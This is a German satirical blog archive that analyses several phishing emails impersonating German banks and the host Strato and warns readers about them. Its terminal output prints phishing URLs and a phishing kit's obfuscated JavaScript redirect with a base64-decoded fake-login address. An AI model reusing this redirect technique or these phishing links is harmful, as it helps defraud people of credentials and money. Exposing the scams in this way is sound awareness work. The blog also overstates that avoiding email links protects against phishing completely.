Eine richtige Bank würde die Kontonummer nennen, weil ein erheblicher Teil ihrer Kunden mehrere Konten hat – zum Beispiel, um die Umsätze aus selbstständiger Tätigkeit sauber vom Privatkram zu trennen. Ein Trickbetrüger kann da nicht einfach eine Zahl hinschreiben, weil jeder Kunde sofort bemerken würde, dass es keine seiner Kontonummern ist, und deshalb fehlt diese Angabe. Um zu sehen, dass es sich um einen Betrugversuch handelt (wenn man es nicht eh schon gemerkt hat), muss man also nur hinschauen. 🔍️

Bitte heben Sie die Sperrung über den unten stehenden Link auf:

freischalten

Natürlich führt der Link nicht in die Website der GLS Bank, es ist ja ein Trickbetrug. Leider kann ich nicht zeigen, wie die betrügerische Website aussieht, weil der Hoster…

$ host https://upbeat-chatterjee.40-85-141-198.plesk.page/
Host https://upbeat-chatterjee.40-85-141-198.plesk.page/ not found: 3(NXDOMAIN)
$ _

…längst den Stecker gezogen hat. Hoffentlich hat er Vorkasse genommen! Denn die Hostingunternehmen werden natürlich ebenfalls betrogen. 🙁️

Zum Glück gibt es einen völlig sicheren Schutz gegen Phishing, was immer noch die häufigste Betrugsform im Internet ist: Einfach niemals in eine E-Mail klicken! Stattdessen die Websites, die für Betrüger interessant sein könnten, immer nur über ein Lesezeichen im Browser aufrufen! Dann kann einem kein Betrüger mit einer E-Mail einen giftigen Link unterschieben. Wenn man eine „komische Mail“ bekommen hat (oder etwas ähnliches über WhatsApp) und sich unsicher ist, ob da „etwas dran ist“, einfach die Website über das Lesezeichen im Webbrowser öffnen und sich dort ganz normal anmelden. Wenn es dort keinen derartigen Hinweis gibt, hat man einen dieser gefürchteten Cyberangriffe abgewehrt. So einfach geht das. 🛡️

*Wenn Sie diesen Hinweis ignorieren, werden Ihre Zahlungsmöglichkeiten vorübergehend ausgesetzt.

Das nennt man übrigens Nötigung. Allein daran kann man sehen, dass diese keine Mail eines Unternehmens ist, bei dem man Kunde ist. 🤔️

*Bitte behalten Sie den Bildschirm im Auge und haben Sie Geduld, während die Anleitung geladen wird. Dies kann mehr als 5 Minuten dauern.

Wie, mehr als fünf Minuten, Spammer?! Selbst, wenn du im Hintergrund nach sämtlichen Sicherheitslöchern in Browser und Betrübssystem guckst und, wo immer es möglich ist, eine aktuelle und bei den Herstellern der Antivirus-Schlangenöle noch ziemlich unbekannte Kollektion Schadsoftware installierst, würde das höchstens zwanzig Sekunden brauchen und fiele während einer Benutzereingabe gar nicht weiter auf. Was hast du dir da für einen Müll zusammengestrokelt? 🤭️

Habe ich eigentlich schon einmal erwähnt, dass es gefährlich ist, in eine E-Mail zu klicken oder einen Anhang aus einer E-Mail zu öffnen. Man weiß nie, wer der Absender ist, denn jeder kann in eine E-Mail jeden beliebigen Absender eintragen, genau so, wie man auch jeden beliebigen Absender auf einen Briefumschlag schreiben könnte, ohne dass der Transport davon beeinträchtigt wird. Das Einzige, was dagegen hilft, sind digitale Signaturen. Nachdem man eine digitale Signatur überprüft hat, weiß man wenigstens, dass der Absender im Besitz eines private key war. Das kostet kein Geld und würde – wenn Banken und Handelsplattformen es durchgängig anwendeten und ihre Nutzer darüber aufklärten – den Phishing-Betrug und viele andere Kriminalitätsformen stark erschweren. Außerdem wäre es ein leichtes, starke Verschlüsselung von E-Mail zu benutzen. Leider ist den meisten Menschen das Klicken zu kompliziert geworden. Und deshalb gilt bis auf weiteres: Der Absender eine E-Mail ist unbekannt. Es kann jeder Mensch sein. Auch einer der vielen Menschen, der nur von seiner Mutter vermisst würde, wenn es ihn nicht gäbe. ☹️

RE: Sicherheitssystem-Update

Dienstag, 5. April 2022

Aber ich habe gar kein Sicherheitssystem. 😉️

Von: BestSign-App <3@mail.serviciocliente-es.com>

Und ich benutze gar keine Apps. Ich habe nicht einmal ein Wischofon. 😉️

Selbst, wenn ich ein Wischofon hätte, käme ich niemals auf die Idee, meine Fernkontoführung auf einem Computer zu machen, auf dem mir das Recht vorenthalten werden soll, selbst darüber zu entscheiden, welche Software darauf läuft. Man macht keine Geldgeschäfte auf einem Botrechner. 🚫️

Ja, ich musste kurz nachschlagen, was hier gephisht wird, denn ich wäre nie darauf gekommen, dass es sich hier um eine Zumutung der Pestbank handelt.

An: Mailadresse, die für normale Leser unsichtbar ist, von mir für nichts benutzt wird und nur für Harvester sichtbar ist

Aha, im Töpfchen für Sieger. 🚽️

Sehr geehrter Kunde,

Aber ganz genau mein Name. 👏️

Sicherheit wird für uns groß geschrieben.

Schön, dass „ihr“ euch an die Rechtschreibregeln haltet. 👍️

Aus diesem Grund haben wir unser System für Sie noch sicherer gemacht.

Schön, dann kann ich mich ja entspannt zurücklehnen und die noch sicherere Sicherheit genießen. Hach, so viel gefühlte Sicherheit! ⛱️

Damit die neuen Sicherheitsmaßnahmen anwendbar sind, müssen Sie ihre Daten aktualisieren. Bitte folgen Sie dazu den Anweisung über den Link.

Weiter

Aber was habe ich mit den Verbesserungen der Pestbank an ihren Systemen zu tun? Und inwiefern steigt die Sicherheit, wenn ich lauter Daten noch einmal eingebe, die bei der Pestbank schon bekannt sind? 🤔️

Man muss nicht lange darüber nachdenken, um zu bemerken, dass man hier betrügerisch bestupst werden soll. Dies ist eigentlich immer der Fall, wenn man in so einer E-Mail zum „Klick doch jetzt ganz schnell in die E-Mail“ aufgefordert wird, und der Link…

$ mime-header https://sharp-tereshkova.188-213-140-146.plesk.page/apk-sleepy-roentgen_6xbfw6xl12t.php
HTTP/2 302 
server: nginx
date: Tue, 05 Apr 2022 10:43:49 GMT
content-type: text/html; charset=UTF-8
x-powered-by: PHP/7.4.28
location: https://bestsign-app.serviciocliente-es.com/postbank/
x-powered-by: PleskLin
$ _

…mit dem „Sleepy Röntgen“ geht auch gar nicht zur Website der Pestbank, sondern über eine Weiterleitung in die Domain serviciocliente (strich) es (punkt) com, die nicht einmal an die Pestbank oder an ein anderes deutschsprachiges Unternehmen erinnert. Alle Daten, die man dort auf einer liebevoll nachgemachten Website im Stile der Pestbank eingibt, gehen direkt an organisiert kriminelle Betrüger. 🎭️

Und danach hat man ganz viele Probleme. Je nach dem, wie weitgehend die eigene Identität für betrügerische Geschäfte benutzt wurde, auch gern mal für mehrere Jahre. Die geraubte Lebenszeit gibt einem niemand zurück. Und das Geld, das auf dem Konto war, ist natürlich auch weg. 💸️

Zum Glück gibt es einen ganz einfachen und hundertprozentig wirksamen Schutz vor Phishing, dem immer noch häufigsten Trickbetrug im Internet: Niemals in eine E-Mail klicken! Wenn man sich für seine Bank (und andere Websites, über die man regelmäßig Geld bewegt) ein Lesezeichen im Webbrowser anlegt und diese Websites nur über das Lesezeichen aufruft, kann einem kein Verbrecher einen gifitgen Link unterschieben. Nach Empfang einer derartigen E-Mail einfach die Website über das Lesezeichen im Browser aufrufen und sich ganz normal anmelden! Wenn wirklich etwas vorliegt, wird man darauf auch nach der Anmeldung hingewiesen. Und wenn man nicht hingewiesen wird und sich die Behauptungen in der E-Mail als Bullshit erweisen, dann hat man einen dieser fiesen Cyberangriffe abgewehrt. So einfach geht das! 🛡️

Das sagt einem der Kriminelle natürlich nicht in seiner Spam, sondern:

Sollten Sie der Aufforderung nicht nachkommen, werden wir Ihr Konto aus Sicherheitsgründen einschränken, sodass Sie keine weiteren Aktivitäten über Ihr Konto ausführen können.

Stattdessen macht der die Stimme der Pestbank nach und sagt: „Wenn du jetzt nicht klickst, dann nehmen wir dir das Geld weg“. 🤡️

Wenn die Pestbank so etwas schriebe, wäre diese klare Nötigung ein Fall fürs Gericht. Deshalb schreibt die Pestbank so etwas nicht. Die ist zwar eine ziemliche Pest, diese Pestbank, und sie ist beispielsweise auch der Meinung, dass ein Einzugsgebiet mit rd. 60.000 Menschen drin jetzt mit einem einzigen, für viele teilweise gebrechliche Menschen auch räumlich weit entfernten Geldautomaten auskommen müsse, weil sie glaubt, es sei nicht die Aufgabe und das Geschäftsmodell einer Bank, dass man die Menschen mit dem Geld versorge, das eigentlich ihnen gehört, so dass sie es im Alltag als Geld benutzen können, aber so richtig kriminell ist die Pestbank noch nicht. Nur ein bisschen eklig. Und oft ein bisschen mehr als nur ein bisschen. Übrigens auch in den Gängeleien, mit denen sie ihre Kunden, die auf die bunte Hochglanzreklame voller Sicherheitsphrasen nicht reinfallen, durch Zusatzkosten zur Fernkontoführung mit inhärent unsicheren Endgeräten schubsen will. 😡️

Aber die Widerlichkeit hat sie mit allen Kreditinstituten gemeinsam. 🤢️

Bestellnummer: 8706902

Freitag, 1. April 2022

Aber ich habe doch nichts bestellt.

Von: Strato AG <rahul.bothra@free.fr>

Von diesem Hosting-Dienstleister, der – wenn diese Mail wirklich von Strato wäre – nicht dazu imstande ist, einen Mailserver in seiner eigenen Domain zu betreiben. 🗑️

An: gammelfleisch <gammelfleisch@tamagothi.de>

Im Töpfchen für Sieger! 🚽️

Mit aus dem Web mitgenommenem Logo, damit es auch nach Strato aussieht. 🎭️

Bestellnummer: 8706902

Genau mein Name! 👍️

Immerhin muss ich dem Spammer zugute halten, dass die sinnlose Zahl aus dem Mailtext der sinnlosen Zahl aus dem Betreff entspricht. Das schafft nicht jeder Spammer mit seinem Phishing-Müll. 🏆️

Die Kündigung Ihrer Domain erfolgt am 05.04.2022

Ein echter Hoster würde reinschreiben, um welche Domain es sich handelt, denn viele seiner Kunden haben mehrere Domains. 😉️

Bitte aktualisieren Sie Ihre Zugangsdaten, um Ihren Domainnamen von hier aus zu erneuern:

https://strato.de/do=generomed-pharma.de

Es ist eine HTML-formatierte Spam. Der Link geht auf eine völlig andere Adresse

$ lynx -source "https://t.co/naU8Px1JVD"
<html>
<head></head>

<script type='text/javascript'>
 
if(window.location.href.split('#')[1]>0){
  location=atob('aHR0cHM6Ly9hamFyYXMubmV0Ly0vY3NzL2FwcHN1aXRlL2luZGV4Lmh0bWw='); 
} else {
  location= "https://google.com/";
}

 </script>

</html>
$ echo "aHR0cHM6Ly9hamFyYXMubmV0Ly0vY3NzL2FwcHN1aXRlL2luZGV4Lmh0bWw=" | base64 -d
https://ajaras.net/-/css/appsuite/index.html
$ lynx -dump https://ajaras.net/-/css/appsuite/index.html
   [1]Kunden-Login
   [2]Hilfe & Kontakt

In welchen Bereich möchten Sie sich einloggen?

   STRATO Kunden-Login
   Webmail
   HiDrive
   Webshops
   Homepage-Baukasten
   Server-Login
   Kundenshop

   STRATO Kunden-Login
   Zugangsdaten nicht erkannt. Bitte überprüfen Sie Ihre Eingaben und
   versuchen Sie es erneut.
   Benutzername oder Kundennummer ____________________
   Passwort ____________________
   [3]Passwort vergessen?
   (BUTTON) Login
   Info

   In Ihrem persönlichen STRATO Kunden-Login haben Sie Zugriff auf Ihre
   Kundendaten und verwalten Ihre Produkte:
     * Produkt-, Rechnungs- & Vertragsübersicht
     * E-Mail Postfächer einrichten
     * Domains und Zusatzartikel verwalten
     * Angebote des Monats zu attraktiven Preisen

   [4]So können Sie sich einloggen







     * STRATO International
     * 24/7 Experten Support
     * Hilfe & Kontaktl
     * AGB
     * Sitemap

Verweise

   1. https://ajaras.net/-/css/appsuite/index.html
   2. https://ajaras.net/-/css/appsuite/index.html
   3. https://ajaras.net/-/css/appsuite/index.html
   4. https://ajaras.net/-/css/appsuite/index.html
$ _

Ich hoffe, es ist unnötig, zu erwähnen, dass ajaras (punkt) net nicht die Domain von Strato ist und dass die echte STRATO AG es auch nicht nötig hätte, so eine lustige Javascript-Weiterleitung mit einer Base64-codierten Zeichenkette zu machen. Die Login-Daten, die man dort eingibt, gehen zu Verbrechern, die mit den Domains verbrecherische Dinge tun werden. Wer darauf reingefallen ist, kann sich schon einmal innerlich auf eine Menge Ärger vorbereiten. Denn die Polizei ermittelt natürlich erstmal beim Domainbesitzer, wenn dort Phishing-Seiten liegen, betrügerische Angebote gemacht werden oder bildhafte Darstellungen und Filme eines sexuellen Kindesmissbrauches verkauft werden. Weder die Hausdurchsuchung noch die Beweissicherung am Arbeitsplatz machen Spaß. ☹️

Zum Glück gibt es eine ganz einfache Technik, die wirksam verhindert, dass man jemals Opfer eines solchen Phishings werden kann: Niemals in eine E-Mail klicken. 📬️🖱️🚫️

Wer solche Seiten in seinem Webbrowser als Lesezeichen abgespeichert hat und sie nur über die Lesezeichen aufruft, kann keinen giftigen Link untergeschoben bekommen. Wenn man angesichts einer solchen E-Mail einmal unsicher geworden ist: Einfach die Website von STRATO übers Lesezeichen aufrufen und dort ganz normal anmelden. Wenn sich dabei zeigt, dass das in der E-Mail behauptete Problem gar nicht existiert, hat man einen kriminellen Angriff – neudeutsch: Cybercrime – erfolgreich abgewehrt. So einfach war das! 🛡️

Phishing dürfte immer noch die häufigste Kriminalitätsform im Internet sein. Diese Mail ist relativ einfach als Phishing zu erkennen, aber es gibt auch besser vorgetragenes, personalisiertes Phishing. Mit namentlicher Ansprache. Daten haben die Kriminellen leider mehr als genug. Der Schutz gegen Phishing kostet nichts und ist nicht einmal mit einem Komfortverlust verbunden. Man klickt einfach nicht in E-Mail… 😉️

Mit freundlichen Grüßen
Ihr STRATO-Team

Freundlich wie ein Kackhaufen vor der Haustür
Ihr Phisher 🎣️

Mittteilung Ihrer Sparkasse

Montag, 28. März 2022

Aber ich bin doch gar nicht bei der Spaßkasse! 🤡️

Meine Exemplare dieser Spam – ja, ich habe davon mehrere – wurden alle über eine IP-Adresse aus China versendet. Hoffentlich würde keine Bank ihre Kundenkommunikation ins Ausland geben, so teuer ist der Betrieb eigener Server nicht. Außerdem wäre es ein Datenschutzproblem. 😉️

Diese Spam kommt also nicht von der Spaßkasse, sondern von Kriminellen, die sich als Spaßkasse ausgeben wollen.

Beide Bilder wurden über Imgur eingebettet, was ich in letzter Zeit generell sehr häufig in Spam sehe. Offenbar hat Imgur den Kampf gegen den kriminellen Missbrauch seines kostenlosen Bildhostings aufgegeben und lädt die damit verbundenen Probleme jetzt der ganzen Restwelt auf, um sich völlig auf den eigenen Reibach mit seinem Geschäftsmodell der Reklameplatzvermarktung widmen zu können. Das ist ziemlich asozial. Der davon erweckte, für Imgur sehr nachteilhafte Eindruck wird auch nicht dadurch wieder aufpoliert, dass das Logo jetzt blau-gelb ist und Imgur angibt, auf Seiten der Menschen in der Ukraine zu stehen, sondern es wirkt auf diesem Hintergrund eher wie billige und menschenverachtende Reklame. Offenbar ist der Austausch eines Logos und das Einpflegen eines Spruches in das Template für die Website wesentlich preiswerter als ein aktiver und wirksamer Beitrag dazu, dass man die Welt mit seiner Website nicht zu einem schlechteren, kriminelleren Ort macht, in dem asozial spammende Betrüger gedeihen. 🤢️

Sehr geehrter Kunde,

Genau mein Name! 👏️

Durch die neuen Gesetze des Bundes sind wir die Zahlungsdienstleister dazu hingewiesen worden in regelmäßigen Abständen Daten unserer Sparkassen-Kunden zu verifizieren.

So so, Gesetze sind dafür da, euch Zahlungsdienstleister hinzuweisen. 😂️

Wir als Ihr Kreditinstitut haben die Anforderungen umgesetzt.

Ach, ist es jetzt doch kein Hinweis, sondern eine Anforderung. 🤦‍♂️️

Mit der Authentifizierung können unsere Kunden Ihre Daten für die Legitimation ganz bequem durchführen.

Eben habt ihr noch gesagt, ihr habt etwas gemacht. Und jetzt soll ich etwas machen, wenn ich euer Kunde bin. Das ist nicht nur ein bisschen unglücklich formuliert, das klingt wie ein Dickdarm, der im Schädel endet. Einmal ganz von dem leckeren Wortsalat aus „Authentifizierung“ und „Legitimation“ abgesehen, der klar macht, dass ihr selbst nicht wisst, was ihr schreibt. 🤡️

Was ist euer Dolmetscher eigentlich von Beruf? 😁️

Anschließend werden die von Ihnen eingetragenen Informationen an einen unserer Fachkraft übermittelt und genehmigt.

Aha, und wenn ich lauter Daten eingegeben und an euch abgesendet habe, dann ruft ihr mich nochmal an, damit ich auch eine von euch veranlasste Überweisung mit meinem zusätzlichen Sicherheitsgerät bestätige. Danach höre ich nie wieder von euch. Das Geld ist weg. 💸️

Aber dafür höre ich von den ganzen anderen Unternehmen, bei denen ihr meine Daten und meine Bankverbindung angegeben habt, als ihr betrügerische Bestellungen hochpreisiger Produkte gemacht habt. Denn das sind auch die Daten, die dann beim Staatsanwalt liegen. Das versaut schnell viele Jahre begrenzter Lebenszeit mit allerlei Ärger, den man mit Untersuchungsgerichten, Inkassounternehmen, Rechtsanwälten und der Kriminalpolizei hat. Ach ja, und Kosten macht es auch. 💸️

Die Authentifizierung muss bis zum 31.03.2022 abgeschlossen werden. Wir bitten Sie daher diese Überprüfung in geraumer Zeit abzuschließen. Andernfalls werden wichtige Funktionen Ihres Onilne-Bankings für eine bestimmte Zeit deaktiviert.

Hui, „in geraumer Zeit“. So schade, dass ihr das Adjektiv „geraum“ selbst nicht versteht. Es bezeichnet hier eine sehr lange Zeitspanne. Oder genauer gesagt, es hat vor geraumer Zeit, als es noch nicht völlig veraltet war, eine sehr lange Zeitspanne bezeichnet. Da kann ich euren zeitlich etwas engen Termin ja ruhig verpassen! 🤣️

Wir bedanken uns für Ihre Aufmerksamkeit.

Stilsicher mit echtem, pseudohöflichem Dank für Nichts. 🖕️

Ihr Ansprechpartner:

Unser 24h Service ist taglich für Sie da.

Das ist ja schön! 🤖️

More 43 5 0180 555■■■■

MoreE-mail schreiben

Jetzt bestätigen

Dass der Klicki-klicki-Link nicht zur Spaßkasse geht, brauche ich hoffentlich nicht weiter zu erwähnen. Tatsächlich geht er erstmal in eine Google-Redirection, denn Google ist ja immer noch der größte Freund des Spammers. Und dort sollte es dann zur Website in der Domain spk (strich) kundenanfrage (punkt) com weitergehen, aber der Hoster hat erstmal den Stecker gezogen. 🔌️

Es kann ja auch nicht jeder Mensch in diesem Internet so gleichgültig gegenüber der Kriminalität wie Google oder Imgur sein. 👍️

Zum Glück gibt es einen hundertprozentigen Schutz vor Phishing, der immer noch häufigsten Betrugsform im Internet: Niemals auf einen Link in einer E-Mail klicken! 🖱️🚫️

Immer Websites aus dem Webbrowser heraus aufrufen.

Wer sich für die Website seiner Bank (und seiner Online-Händler etc.) Lesezeichen im Webbrowser anlegt und sich angewöhnt, diese Websites nur über diese Lesezeichen aufzurufen, kann von keinem Kriminellen einen irreführenden Link untergeschoben bekommen. Das geht ohne jeden Komfortverlust. Man hat eine E-Mail mit alarmierendem oder verstörendem Inhalt erhalten, klickt auf das Lesezeichen im Webbrowser, meldet sich dort ganz normal an. Wenn sich dabei zeigt, dass man nach der Anmeldung nicht mit den Forderungen aus der E-Mail belästigt wird, hat man einen dieser gefürchteten Cyberangriffe abgewehrt. So einfach ist das! 🛡️

Mittteilung Ihrer Sparkasse

Sonntag, 13. März 2022

Abt.: Geschlechtergerechtes Phishing 🎣️

Sehr geehrte*r Kunde*in,

Durch die neuen Änderungen des Bundes sind wir die Finanzdienstleister dazu aufgefordert worden in regelmäßigen Abständen Daten unserer Sparkassen-Kunden zu verifizieren.

Wir als Ihr Bankinstitut haben die Aufforderungen umgesetzt.

Mit dem Verfahren können unsere Kunden Ihre Daten für die Verifizierung ganz schnell abschließen.

Anschließend werden die von Ihnen übermittelten Daten an einen unserer Mitarbeiter der IT-Abteilung überreicht und genehmigt.

Die SAuthentifikation muss bis zum 31.03.2022 abgeschlossen werden. Wir bitten Sie daher diese Legitimation in geraumer Zeit zu beenden. Andernfalls werden elementare Funktionen Ihres Onilne-Bankings vorübergehend eingeschränkt.

Wir bedanken uns für Ihre Aufmerksamkeit.

Ihr Ansprechpartner:

Unser 24h Service ist taglich für Sie da.

More 43 5 0180 5553232

More E-mail schreiben

Zur Bestätigung

Natürlich kommt diese Spam nicht von der Spamkasse, sondern ist eine Spam. Sie ist auch nicht weiter bemerkenswert und leicht erkennbar, weil sie den gleichen Bullshit enthält wie jede andere Phishing-Spam: Weder wird der Kunde namentlich angsprochen, noch wird klargemacht, auf welches Konto mit welcher Kontonummer sich diese Mail bezieht. Es ist also selbst für trübere Geister völlig offensichtlich, dass es sich um die Massenware eines Betrügers handelt. 💩️

Weshalb ich diese Spam erwähnenswert finde, ist die Anredeform „Sehr geehrte*r Kunde*in“. Es ist das erste Mal, dass ich eine Spam habe, deren Anredeform gegendert ist. Es ist schon ein bisschen erstaunlich, dass mir diese akademische First World Problem Solution höherer Töchter in einer Spam begegnet, aber ich vermute mal, dass dieser Spammer glaubt, dass er offizieller klinge, wenn er geschlechtertrennende Sprache¹ verwendet. 🤭️

Denn in persönlicher Kommunikation hat sich diese unschöne Form² nicht durchgesetzt. Sie taucht beinahe nur im Kunstdeutsch behördlicher Schriftstücke, in geisteswissenschaftlich-akademischen Übungen und Arbeiten, in denen sie oft erzwungen wird sowie in der Kommunikation jener Unternehmen auf, die nicht unbedingt Kund*innen haben wollen. 😲️

Und neuerdings auch in Spam. Da wächst zusammen, was zusammen gehört. 😁️

Wenn das Schule macht, wird es demnächst zu einer gängigen Filterregel, um die Spam auf dem Mailserver auszusortieren. Ein großer Sieg für die geschlechtertrennende Sprache! 🏆️

¹Das Attribut „geschlechtertrennend“ für eine Schreibkonvention, die trennende Zeichen vor grammatischen Genusendungen setzt, erscheint mir allemal passender als das Attribut „geschlechtergerecht“.

²Liebe Mitlesys, die ihr meint, dass ich zu negativ klinge: Hin und wieder gendere ich auch, indem ich das neutrale Genus und die Endung -y verwende. Das hat den großen Vorteil, ohne Stimmritzenverschlusslaute sprechbar zu sein, nicht wie ein Fremdkörper im Schriftbild auszusehen und nicht den Eindruck völliger Verkrampftheit zu machen. Ich empfehle das auch euch zur Nachahmung, wenn ihr wenigstens so wirken wollt, als hättet ihr Heiterkeit und Sprachgefühl. Bei mir hat sich bis jetzt noch niemandy darüber beschwert.

Unser täglich Spam

Aus dem Internet frisch auf den Tisch. Köstlich und aromatisch.

Kategoriearchiv „Phishing“

Ihre Rechnung, Rechnungs-Nr.137784 vom 25.04.2022

Wichtige Mitteilung !

Re : Wichtige Mitteilung !

Wichtige neue Nachricht

RE: Sicherheitssystem-Update

Bestellnummer: 8706902

Mittteilung Ihrer Sparkasse

Mittteilung Ihrer Sparkasse